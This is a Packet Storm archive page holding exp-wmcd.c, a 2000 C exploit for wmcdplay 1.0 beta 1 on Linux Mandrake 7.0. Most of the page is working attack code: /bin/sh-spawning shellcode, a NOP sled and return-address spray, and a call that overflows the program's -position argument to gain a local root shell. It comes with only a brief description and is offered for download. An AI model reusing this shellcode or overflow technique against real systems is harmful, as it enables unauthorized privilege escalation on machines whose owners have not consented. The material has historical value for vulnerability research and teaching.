what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

exp-wmcd.c

exp-wmcd.c
Posted Apr 19, 2000
Authored by Dethy

Local exploit for Linux Mandrake 7.0's wmcdplay 1.0 beta 1. Unlike the Teso exploit for wmcdplay, this code exploits the -position argument.

tags | exploit, local
systems | linux, mandrake
SHA-256 | eed00eb19c97858a9e3a92302523c50bd3259f79d45239243286e9ab1b43681f

exp-wmcd.c

Change Mirror Download
/*
Local exploit for Linux Mandrake 7.0's wmcdplay 1.0 beta 1
- Found by TESO crew originally, although multiple bof's exist elsewhere.
- I chose the "-position" argument to exploit, TESO used the "-d".

Code: dethy @ synnergy.net
*/

#include <stdio.h>
#include <stdlib.h>

#define NOP 0x90
#define BS 1300
#define OFF 400 /* increment +- 100 */

/* uid(0); euid(0); */
char shellcode[] =
"\xeb\x1f" /* jmp 0x1f */
"\x5e" /* popl %esi */
"\x89\x76\x08" /* movl %esi,0x8(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x88\x46\x07" /* movb %eax,0x7(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xd8" /* movl %ebx,%eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int $0x80 */
"\xe8\xdc\xff\xff\xff" /* call -0x24 */
"/bin/sh"; /* .string \"/bin/sh\" */


u_long get_sp(void) { __asm__("movl %esp,%eax"); }

void main(int argc, char **argv) {
char *buffer, *ptr; long *address_ptr, *address;
int i, bsize = BS, nop = NOP, offset = OFF;
buffer = malloc(bsize);

(char *)address = get_sp() - offset;
printf("return address: %#x\n", address);

ptr = buffer;
address_ptr = (long *)ptr;

for(i=0; i < bsize; i += 4) (int *) *(address_ptr++) = address;
for(i=0; i < bsize / 2 ; i++) buffer[i] = nop;

memcpy(buffer + i, shellcode, strlen(shellcode));
execl("/usr/X11R6/bin/wmcdplay", "wmcdplay", "-position", buffer, 0);
}
/* www.hack.co.za [21 July]*/
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close